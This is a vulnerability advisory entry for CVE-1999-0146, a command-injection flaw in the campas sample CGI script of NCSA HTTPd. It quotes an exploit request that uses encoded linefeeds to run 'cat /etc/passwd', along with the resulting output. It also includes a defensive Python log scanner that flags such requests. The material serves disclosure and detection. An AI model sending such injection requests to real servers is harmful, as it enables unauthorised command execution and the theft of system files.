NCSA HTTPd Sample Script Vulnerability

Vulnerability ID: 1105319
Vulnerability type: Input validation
Published: 1997-07-15
Updated: 2006-11-16
CVE ID: CVE-1999-0146
CNNVD-ID: CNNVD-199707-024
Platform: CGI
CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/20423
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199707-024
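|Vulnerability details
The campas CGI program shipped with some NCSA web servers is vulnerable. An attacker can execute arbitrary commands by means of encoded carriage return characters in the query string, as demonstrated by reading the password file.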
|Exploit
source: http://www.securityfocus.com/bid/1975/info

Campas is a sample CGI script shipped with some older versions of NCSA HTTPd, an obsolete web server package. The versions that included the script could not be determined as the server is no longer maintained, but version 1.2 of the script itself is known to be vulnerable. The script fails to properly filter user-supplied variables, and as a result can be used to execute commands on the host with the privileges of the web server. Commands can be passed as a variable to the script, separated by %0a (linefeed) characters. See the exploit below for an example. Successful exploitation of this vulnerability could be used to deface the web site, read any files the server process has access to, get directory listings, and execute anything else the web server has access to.

> telnet target 80
[...]
GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a
<PRE>
root:x:0:1:Super-User:/export/home/root:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:/bin/false
[...]
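
A detection check for the request pattern shown above, as an added example that is not part of the original advisory: it scans NCSA Common Log Format access-log lines for CGI requests whose query string decodes to a linefeed or carriage return, and goes beyond the single case in the text by also catching double-encoded forms. The log lines, client addresses, the `/cgi-bin/` prefix default and the function names are constructed assumptions.

```python
import re
from urllib.parse import unquote

# NCSA Common Log Format: host ident user [time] "request" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) ([^\s"]+)[^"]*" (\d{3}) \S+')


def has_encoded_newline(query, max_rounds=3):
    """True if the query string yields CR or LF within max_rounds URL-decodes."""
    for _ in range(max_rounds):
        if "\r" in query or "\n" in query:
            return True
        decoded = unquote(query)
        if decoded == query:  # nothing left to decode
            return False
        query = decoded
    return "\r" in query or "\n" in query


def suspicious_requests(lines, prefix="/cgi-bin/"):
    """Return (client, path, status) for CGI requests carrying encoded CR/LF."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue  # not a Common Log Format line
        client, _method, target, status = m.groups()
        path, _, query = target.partition("?")
        if path.startswith(prefix) and has_encoded_newline(query):
            hits.append((client, path, int(status)))
    return hits


# Constructed log lines (documentation addresses); the first mirrors the request above.
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Jul/1997:10:00:01 +0000] "GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a" 200 512',
    '198.51.100.7 - - [15/Jul/1997:10:00:05 +0000] "GET /cgi-bin/search?q=ncsa+httpd HTTP/1.0" 200 1024',
    '203.0.113.5 - - [15/Jul/1997:10:00:09 +0000] "GET /cgi-bin/form?x=a%250Db HTTP/1.0" 404 0',
    '198.51.100.7 - - [15/Jul/1997:10:00:12 +0000] "GET /docs/readme.html?note=%0a HTTP/1.0" 200 90',
]

if __name__ == "__main__":
    for client, path, status in suspicious_requests(SAMPLE_LOG):
        print(f"{client} {path} status={status}")
```

A flagged request that was answered with status 200 was served by the script rather than rejected, so those entries are the ones to review first.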
|References

Source: XF
Name: http-cgi-campas(298)
Link: http://xforce.iss.net/xforce/xfdb/298
Source: BID
Name: 1975
Link: http://www.securityfocus.com/bid/1975